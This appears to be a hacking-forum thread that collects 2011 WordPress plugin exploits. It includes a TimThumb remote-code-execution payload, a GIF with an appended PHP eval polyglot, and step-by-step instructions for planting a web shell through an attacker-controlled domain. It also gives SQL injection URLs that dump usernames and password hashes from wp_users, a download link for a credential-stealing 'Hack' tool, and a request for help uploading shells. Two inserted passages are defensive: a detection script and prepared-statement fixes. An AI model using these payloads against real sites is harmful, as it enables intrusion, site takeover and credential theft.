Knocked together a mini-program: everyone's dream! The "Hack" button now works.
Instructions: find a vulnerable site and enter it into the program without http:// and without slashes (/), like binaries.ru, and you get login:pass in Result.
Download: _http://rghost.ru/14736221
WordPress TimThumb Plugin - Remote Code Execution
Code:
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)

WordPress TimThumb (Theme) Plugin - Remote Code Execution

Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)

Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.

External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/

Credits:
- Mark Maunder (Original Researcher)
- MaXe (Independent Proof of Concept Writer)

-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, because the script does not check remotely cached files properly.

By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.

Attack URL: (Note! Some websites use Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);

md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>)

-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.

NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb

Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011

References:
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
http://code.google.com/p/timthumb/issues/detail?id=212
http://programming.arantius.com/the+smallest+possible+gif
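As an added defensive counterpart to the advisory (this is not code from the advisory, from TimThumb or from any project named in this thread): a PHP command-line audit that does the advisory's `find . | grep php | xargs grep -s timthumb` step in script form and then looks for files with the shape of the proof-of-concept above, an image signature followed by a PHP open tag, which is what a fetched payload looks like once it sits in a theme's cache/ directory as .php. The script name timthumb-audit.php, the 1 MiB read limit and the set of image signatures checked are assumptions of this example, not TimThumb's.

```php
<?php
/*
 * Added example, not part of the advisory or of TimThumb.
 * Usage (assumed): php timthumb-audit.php /path/to/wordpress
 * 1) lists every .php file that mentions "timthumb" (the advisory's grep,
 *    so it also matches renamed copies and, if stored under the root,
 *    this script itself);
 * 2) flags files that start with an image magic number yet contain a PHP
 *    open tag; a genuine GIF/JPEG/PNG never does, the PoC file above does.
 */

// Magic numbers of the image types TimThumb resizes (assumed set).
const IMAGE_MAGICS = [
    "GIF87a",
    "GIF89a",
    "\xFF\xD8\xFF",        // JPEG
    "\x89PNG\r\n\x1A\n",   // PNG
];

function has_image_magic(string $bytes): bool {
    foreach (IMAGE_MAGICS as $magic) {
        if (strncmp($bytes, $magic, strlen($magic)) === 0) {
            return true;
        }
    }
    return false;
}

// Image header followed anywhere by "<?php" or "<?=": the polyglot shape.
function is_image_php_polyglot(string $bytes): bool {
    return has_image_magic($bytes)
        && (stripos($bytes, '<?php') !== false || strpos($bytes, '<?=') !== false);
}

// Same heuristic as `find . | grep php | xargs grep -s timthumb`.
function mentions_timthumb(string $path): bool {
    if (strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'php') {
        return false;
    }
    $src = @file_get_contents($path, false, null, 0, 1048576);
    return $src !== false && stripos($src, 'timthumb') !== false;
}

function audit_wordpress_tree(string $root): array {
    $findings = ['timthumb_copies' => [], 'polyglots' => []];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $info) {
        if (!$info->isFile()) {
            continue;
        }
        $path = $info->getPathname();
        if (mentions_timthumb($path)) {
            $findings['timthumb_copies'][] = $path;
        }
        // Only the head of each file is read (1 MiB, an assumed limit): the
        // GIF header and the "<?php" of the PoC sit in its first 60 bytes.
        $head = @file_get_contents($path, false, null, 0, 1048576);
        if ($head !== false && is_image_php_polyglot($head)) {
            $findings['polyglots'][] = $path;
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $findings = audit_wordpress_tree($argv[1]);
    foreach ($findings['timthumb_copies'] as $p) {
        echo "timthumb copy (check its version; update to 1.34 or remove): $p\n";
    }
    foreach ($findings['polyglots'] as $p) {
        echo "image/PHP polyglot (shape of a cached payload): $p\n";
    }
    if (!$findings['timthumb_copies'] && !$findings['polyglots']) {
        echo "nothing found under $argv[1]\n";
    }
}
```

Run it against the WordPress root. Every reported timthumb copy is a file to update or delete as the Solution section says; a polyglot hit inside a cache/ directory means the remote fetch already happened on that host, so it is an incident to investigate, not just a file to clean up.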
PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]
alixcan_life_f.php
PHP:
<?php
/*
Plugin Name: AlixcaN LiveFeed
Plugin URI: http://www.alixcan.net/wordpress/eklentiler/wordpress-canli-yayin-eklentisi-v1-0
Description: Alixcan.Net Wordpress sitenizden facebook, twitter tarzı feedler atmanızı sağlayan sistem.
Version: 1.0
Author: AlixcaN | Alican Ertürk
Author URI: http://www.alixcan.net
*/
$pluginadi = $_GET['plugin'];
$parcala = explode('_',$pluginadi);
if($_GET['action'] == 'activate' && $parcala[0]=='alixcan' && $parcala[1]=='live'){
    mysql_query("
    CREATE TABLE IF NOT EXISTS `wp_alixlivefeed` (
      `id` int(11) NOT NULL AUTO_INCREMENT,
      `baslik` varchar(225) COLLATE utf8_turkish_ci NOT NULL,
      `resim` text COLLATE utf8_turkish_ci NOT NULL,
      `date` datetime NOT NULL,
      PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_turkish_ci AUTO_INCREMENT=1 ;
    ");
}

function alixcan_live_feed_ali() {
    if(isset($_GET['feedlist']) == 'alix_feed_list'){
        $sayfa_basina = 10;
        $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");
        $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);
        $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;
        $basla = ($sayfa - 1) * $sayfa_basina;
        $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");
        if(mysql_num_rows($sql)>0){
            echo '<h3>Gönderdiğiniz Feedler</h3>
            <table cellpadding="5" style="border:1px solid #ddd; margin-bottom:5px;" cellspacing="5">
            <tr>
            <td style="width:5%; font-weight:bold">ID</td>
            <td style="width:70%; font-weight:bold">Mesaj</td>
            <td style="width:25%; font-weight:bold">Tarih</td>
            </tr>
            ';
            while ($row = mysql_fetch_object($sql)){
                echo '<tr>';
                echo '<td>'.$row->id.'</td>';
                echo '<td>'.$row->baslik.'</td>';
                echo '<td>'.$row->date.'</td>';
                echo '</tr>';
            }
        }
        echo '</table>';
        if($sayfalar>=1 && $sayfa <= $sayfalar){
            echo '<div class="sayfalar">Sayfalar: ';
            $link = 'index.php?feedlist=alix_feed_list&';
            for($x=1; $x<=$sayfalar; $x++){
                echo '<a href="'.$link.'alix_sayfa='.$x.'">';
                echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';
                echo '</a>';
            }
            echo '</div>';
        }
        echo '<p><a id ="upload_image" href="index.php">Feed Gönder</a></p>';
    }elseif(isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live'){
        echo '<p> Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.<br />
        Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.<br />
        Bu Yazıları
        <p style="margin-left:15px;">
        [alixcan_live_feed] - Tüm Yazıları Listeler <br />[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler
        </p>
        Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.
        </p>';
    } else{
?>
<?php if($_POST['submittwit']){
    $baslik = $_POST['baslik'];
    $resim = $_POST['upload_image'];
    $date = $_POST['date'];
    global $wpdb;
    $veri_dizisi = array( 'baslik' => $baslik, 'resim' => $resim, 'date' => $date );
    $wpdb->insert( 'wp_alixlivefeed', $veri_dizisi );
    echo 'Yazı Eklendi';
} /* end of submittwit */?>
<script>
jQuery(document).ready(function() {
    jQuery('#upload_image_button').click(function() {
        formfield = jQuery('#upload_image').attr('name');
        tb_show('', 'media-upload.php?type=image&TB_iframe=true');
        return false;
    });
    window.send_to_editor = function(html) {
        imgurl = jQuery('img',html).attr('src');
        jQuery('#upload_image').val(imgurl);
        tb_remove();
    }
});
</script>
<form action="" enctype="multipart/form-data" method="POST">
<p>
<label for="baslik">Başlık:<span style="color:red;font-size:9px">En Fazla 255 Karakter</span></label><br />
<input type="text" name="baslik" id="baslik" style="width:100%" />
</p>
<p>
<label for="upload_image">Resim:</label><br />
<input id="upload_image" type="text" size="36" name="upload_image" value="" />
<input id="upload_image_button" type="button" value="Resim Yükle" /><br />
Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.<span style="display:block;font-size:9px;color:red;">Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir</span>
</p>
<input type="hidden" id="date" name="date" value="<?php echo date("Y-m-d G:i:s");?>" />
<p class="submit">
<input type="submit" name="submittwit" id="submittwit" />
</p>
</form>
<p><a id ="upload_image" href="index.php?feedlist=alix_feed_list">Feedleri Listele</a></p>
<?php
    } // else
} // function

function alixcan_live_feed_setup() {
    $yazi = (isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live') ? '<a href="index.php">Kapat</a>' : '<a href="index.php?edit=dashboard_alix_live#dashboard_alix_live" class="edit-box open-box">Hakkında</a>';
    wp_add_dashboard_widget( 'alixcan_live_feed_ali', __( 'Canlı Yayın & Live Feed<span class="postbox-title-action">'.$yazi.'</span>' ), 'alixcan_live_feed_ali' );
}
add_action('wp_dashboard_setup', 'alixcan_live_feed_setup');

function head_ekle(){
    echo '<link rel="stylesheet" href="'.WP_PLUGIN_URL.'/alixcan_live_f/style.css" type="text/css" />';
}
add_action('wp_head', 'head_ekle');

add_shortcode('alixcan_live_feed', 'alixcan_live_feed_shortcode');
function alixcan_live_feed_shortcode( $atts, $content = null){
    global $post;
    extract( shortcode_atts( array( 'id' => '' ) , $atts ) );
    if(empty($id)){
        $sayfa_basina = 10;
        $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");
        $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);
        $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;
        $basla = ($sayfa - 1) * $sayfa_basina;
        $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");
        if(mysql_num_rows($sql)>0){
            echo '<div id="alixcan">
            <ul id="list">';
            while ($row = mysql_fetch_object($sql)){
                echo '<li>';
                echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';
                echo $row->baslik.'<br /><em>'.$row->date.'</em>
                <div style="clear:both;"></div>
                </li>
                ';
            }
            echo '</ul>';
        }else{
            echo '<div style="display:block;float:none;">Henüz İçerik Girilmemiş</div>';
        }
        if($sayfalar>=1 && $sayfa <= $sayfalar){
            echo '<div class="sayfalar">Sayfalar: ';
            $link = get_option('home'). '?p='. get_the_ID();
            for($x=1; $x<=$sayfalar; $x++){
                echo '<a href="'.$link.'&alix_sayfa='.$x.'">';
                echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';
                echo '</a>';
            }
            echo '</div>';
        }
        echo '</div>';
    }else{
        $sqlsor = mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'");
        $row = mysql_fetch_object($sqlsor);
        echo '<div id="alixcan">
        <ul id="list">';
        echo '<li>';
        echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';
        echo $row->baslik.'<br /><em>'.$row->date.'</em>
        <div style="clear:both;"></div>
        </li>
        </ul>
        </div>';
    }//else
}// end of function

exploit:
Code:
http://wp/?alixcan_live_feed=news&id=1+UNION+SELECT+group_concat(user_login,0x3a,user_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
Code:
# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)

--- PoC ---

http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20

--------------- Vulnerable code ---------------

function getPlaylist($id = '') {
    $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
    $playlistRow = mysql_fetch_row($query);
    return $this->withBackwardCompatibility($playlistRow[2]);
}
...
if (!empty($_GET["pp_playlist_id"])) {
    header("Content-type: application/xml");
    $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
Could someone advise on uploading a shell to WordPress MU 2.9.1.1? There you can upload php and php4 files as attachments to posts (I added the file types to the trusted list), but they don't execute, it just displays the code. For some reason I can't edit themes either, there is no such section in Appearance.
Media Library Categories <= 1.0.6 SQL Injection Vulnerability
Code:
# Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/media-library-categories.1.0.6.zip
# Version: 1.0.6 (tested)

--- PoC ---

http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20

http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))

--------------- Vulnerable code ---------------

$termid=$_GET['termid'];
...
$where = '';
if($termid) {
    $where .= " && tt.term_id=".$termid;
}
...
$query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p inner join " . $table_prefix . "term_relationships a on a.object_id = p.ID inner join " . $table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id where ttt.taxonomy='media_category' $where order by a.term_order asc;";
$results = mysql_query($query);
So, the step-by-step instructions:
1. Register a domain: blogger.com.hacker.com
2. Create a script shell.php with this content:
PHP:
<?php
header('Content-Type: image/jpeg');
print file_get_contents('shell.txt'); // your shell: wso, r57, c99, etc.
?>
3. Go here: http://target.com/wp-content/plugins/module/timthumb.php?src=http://blogger.com.hacker.com/shell.php
4. The shell is here: http://target.com/wp-content/plugins/module/cache/75ee2a70bd93faa5ae8ef9b823b8abae.php *
* the file name is md5('http://blogger.com.hacker.com/shell.php')
WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability
Code:
# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)

--- PoC ---

http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1

--------------- Vulnerable code ---------------

$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name where Latitude=%s and Longitude=%s and Blocked = '%s' order by stamp asc limit 50", $_REQUEST["lat"], $_REQUEST["lon"], $_REQUEST["blocked"]);
$res = mysql_query($sql);
WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
Code:
# Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip
# Version: 3.0 (tested)
# Note: user has to be logged in as "admin"

--- PoC ---

http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

--------------- Vulnerable code ---------------

if (isset($_GET['featQuote'])) {
    $id = $_GET['id'];
    mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};
DJ On Air Widget SQL-inj
PHP:
.....
$dj_ids = $wpdb->get_results("SELECT `meta`.`user_id` FROM ".$wpdb->prefix."usermeta AS `meta` WHERE `meta_key` = 'shifts' AND `meta_value` LIKE '%".$sDayTime."%';" );
.....
foreach($dj_ids as $id) {
    $fetch = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."users AS `user` WHERE `user`.`ID` = ".$id->user_id.";");
    $djs[] = $fetch;
}
.....
exploit:
Code:
http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_users+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+WHERE+meta_value=0x613A313A7B733A31333A2261646D696E6973747261746F72223B623A313B7D)--+

Timthumb Vulnerability Scanner path disclosure (this one is just a joke xD)
PHP:
....
if(isset($_REQUEST['cg-action'])){
    switch($_REQUEST['cg-action']){
        case 'scan':
            include_once 'cg-tvs-filescanner.php';
            $scanner = new CG_FileScanner(WP_CONTENT_DIR);
            $scanner->generate_inventory();
            $scanner->scan_inventory();
            update_option('cg_tvs_last_checked', date("Y-m-d H:i:s"));
            update_option('cg_tvs_vulnerable_files', $scanner->VulnerableFiles);
            update_option('cg_tvs_safe_files', $scanner->SafeFiles);
        case 'fix':
            $nonce = $_GET['_wpnonce'];
            if(wp_verify_nonce($nonce, 'fix_timthumb_file')){
                $fix_path = urldecode($_GET['file']);
                $src_file_path = trailingslashit(dirname(__FILE__)).'cg-tvs-timthumb-latest.txt';
                if(FALSE !== $fr = @fopen($src_file_path, 'r')){
                    $latest_src = fread($fr, filesize($src_file_path));
                    fclose($fr);
                }else{
                    $message = "CAN'T READ TIMTHUMB SOURCE FILE";
                    break;
                }
                if(FALSE !== $fw = @fopen($fix_path, 'w')){
                    if(fwrite($fw, $latest_src)){
                        $message = "File <strong>".basename($fix_path)."</strong> at <em>".$fix_path."</em> successfully upgraded.";
                    }else{
                        $message = "Unknown file write error.";
                    }
                }else{
                    $message = "CAN'T OPEN VULNERABLE FILE FOR WRITING";
                    break;
                }
....
exploit:
Code:
http://wp/wp-content/plugins/tvulnerscanner/cg-tvs-filescanner.php?file[]=
Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability
Code:
# Exploit Title: Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44

[ exploit ]
domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--
WP Photo Album Plus 4.0.12

#1 Blind SQLi @ wppa-functions.php:
Code:
function wppa_crumb_page_ancestors($sep, $page = '0') {
    global $wpdb;
    global $wppa;
    $query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1";
    $parent = $wpdb->get_var($query);
    if (!is_numeric($parent) || $parent == '0') return;
    wppa_crumb_page_ancestors($sep, $parent);
    $query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1";
    $title = $wpdb->get_var($query);
    if (!$title) {
        $title = '****'; // Page exists but is not publish
        $wppa['out'] .= wppa_nltab().'<a href="#" class="wppa-nav-text b30" style="'.__wcs('wppa-nav-text').'" ></a>';
        $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b31" style="'.__wcs('wppa-nav-text').'" >'.$title.$sep.'</span>';
    } else {
        $wppa['out'] .= wppa_nltab().'<a href="'.get_page_link($parent).'" class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$title.'</a>';
        $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$sep.'</span>';
    }
}
The $page variable from _GET is not filtered.
exploit: if the gallery page's nesting level is > 1, a malformed request makes the parent element disappear from the breadcrumb navigation.

#2 SQLi @ wppa-functions.php
Code:
$thumbs = $wpdb->get_results('SELECT * FROM '.WPPA_PHOTOS.' WHERE mean_rating > 0 AND album = '.$alb.' ORDER BY mean_rating DESC LIMIT '.$max, 'ARRAY_A');
exploit:
somehomst.com/?page_id=9&topten=1&album=1 UNION ALL SELECT 1,2,3,version(),5,6,7,8,9,10--
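Every query quoted in this thread fails the same way: a request value (pp_playlist_id, termid, lat/lon/blocked, id, the DJ On Air sdate, event_id, the WPPA page and album) is pasted into the SQL string. As an added example, not code from any of those plugins, here are four of the quoted queries (ProPlayer, Media Library Categories, IP-Logger, Collision Testimonials) rewritten with `$wpdb->prepare()` placeholders and `$wpdb->update()` format arrays; the same change fixes the AlixcaN, DJ On Air, Event Registration and WP Photo Album Plus queries. It assumes it is loaded inside WordPress (for instance as an mu-plugin) so that `$wpdb`, `absint()`, `current_user_can()` and `ARRAY_A` exist; the table and column names are the ones the posts show, and the function names are invented here.

```php
<?php
/*
 * Added example, not the plugins' own code. Assumes a loaded WordPress
 * environment: $wpdb, absint(), current_user_can(), ARRAY_A.
 * Rule applied throughout: values go through placeholders (%d, %f, %s),
 * which prepare() escapes and quotes; identifiers (table names) cannot be
 * bound and are handled separately.
 */

// ProPlayer: was  "... WHERE (POST_ID='$id')"  with $id straight from $_GET.
function pp_get_playlist_row( $raw_id ) {
    global $wpdb;
    $id = absint( $raw_id );          // "-1') UNION ..." becomes 0
    if ( 0 === $id ) {
        return null;
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}proplayer_playlist WHERE POST_ID = %d",
        $id
    );
    return $wpdb->get_row( $sql, ARRAY_A );
}

// Media Library Categories: was  $where .= " && tt.term_id=".$termid;
function mlc_get_category_posts( $raw_termid ) {
    global $wpdb;
    $termid = absint( $raw_termid );
    $sql = "SELECT p.*, a.term_order FROM {$wpdb->posts} p
            INNER JOIN {$wpdb->term_relationships} a ON a.object_id = p.ID
            INNER JOIN {$wpdb->term_taxonomy} ttt ON ttt.term_taxonomy_id = a.term_taxonomy_id
            INNER JOIN {$wpdb->terms} tt ON ttt.term_id = tt.term_id
            WHERE ttt.taxonomy = 'media_category'";
    if ( $termid ) {
        // The optional filter is still appended, but as a prepared fragment.
        $sql .= $wpdb->prepare( " AND tt.term_id = %d", $termid );
    }
    $sql .= " ORDER BY a.term_order ASC";
    return $wpdb->get_results( $sql, ARRAY_A );
}

// IP-Logger: sprintf("%s") only formats; prepare("%f"/"%s") escapes.
// Note that %s is written without quotes: prepare() adds them.
function ipl_map_details( $table, $lat, $lon, $blocked ) {
    global $wpdb;
    // Table names cannot be placeholders; backtick-quote a cleaned name
    // (assumed to come from plugin config, never from the request).
    $table = '`' . str_replace( '`', '', $table ) . '`';
    $sql = $wpdb->prepare(
        "SELECT stamp, ip_v4, url, user_agent, Provider, Code3, Country, Blocked, Ignored
         FROM $table
         WHERE Latitude = %f AND Longitude = %f AND Blocked = %s
         ORDER BY stamp ASC LIMIT 50",
        (float) $lat,
        (float) $lon,
        $blocked
    );
    return $wpdb->get_results( $sql, ARRAY_A );
}

// Collision Testimonials: was  "UPDATE $testimonials SET featured=1 WHERE id=$id".
// A state change in wp-admin also gets a capability check, not just a login.
function ct_feature_testimonial( $table, $raw_id ) {
    global $wpdb;
    $id = absint( $raw_id );
    if ( 0 === $id || ! current_user_can( 'manage_options' ) ) {
        return false;
    }
    // $wpdb->update() builds SET and WHERE from the data and format arrays,
    // so no SQL is assembled by hand at all.
    return $wpdb->update(
        $table,
        array( 'featured' => 1 ),   // SET
        array( 'id' => $id ),       // WHERE
        array( '%d' ),              // format of SET values
        array( '%d' )               // format of WHERE values
    );
}
```

The two habits that matter: cast anything that should be a number before it gets near a query (`absint()` turns every PoC string in this thread into 0), and let `prepare()` own the quoting so a `'` or `)` in the input cannot change the statement's shape.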
WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
One of the most popular plugins for WP! Tons of sites) it runs on every second site, if not more often)
Guys, any advice: is there an up-to-date WP plugin scanner that lets you find out which plugins are installed?